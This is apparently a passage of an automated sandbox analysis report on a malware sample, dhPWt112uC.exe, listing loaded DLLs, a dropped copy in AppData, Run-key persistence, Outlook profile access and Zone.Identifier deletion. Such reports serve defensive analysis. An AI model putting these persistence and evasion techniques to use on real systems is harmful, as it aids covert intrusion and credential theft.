                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: dhPWt112uC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: dhPWt112uC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: dhPWt112uC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: CFss.pdb source: dhPWt112uC.exe, newapp.exe.4.dr
                    Source: Binary string: CFss.pdbSHA256Z#5 source: dhPWt112uC.exe, newapp.exe.4.dr
                    Source: dhPWt112uC.exeStatic PE information: 0xEB7C088D [Sat Mar 12 13:20:13 2095 UTC]
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_04BFE7DC push es; ret 0_2_04BFE7E2
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_04BFEDBB push cs; ret 0_2_04BFEDC2
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_04BFEE60 push cs; ret 0_2_04BFEE62
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 0_2_04BFEF00 push cs; ret 0_2_04BFEF02
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_06F0B0D3 push es; ret 10_2_06F0B0E0
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_0564FA98 pushad ; retf 11_2_0564FAA5
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 15_2_069CB0D1 push es; ret 15_2_069CB0E0
                    Source: dhPWt112uC.exeStatic PE information: section name: .text entropy: 7.760942472660535
                    Source: newapp.exe.4.drStatic PE information: section name: .text entropy: 7.760942472660535
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeFile created: C:\Users\user\AppData\Roaming\newapp\newapp.exeJump to dropped file
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newappJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newappJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeFile opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
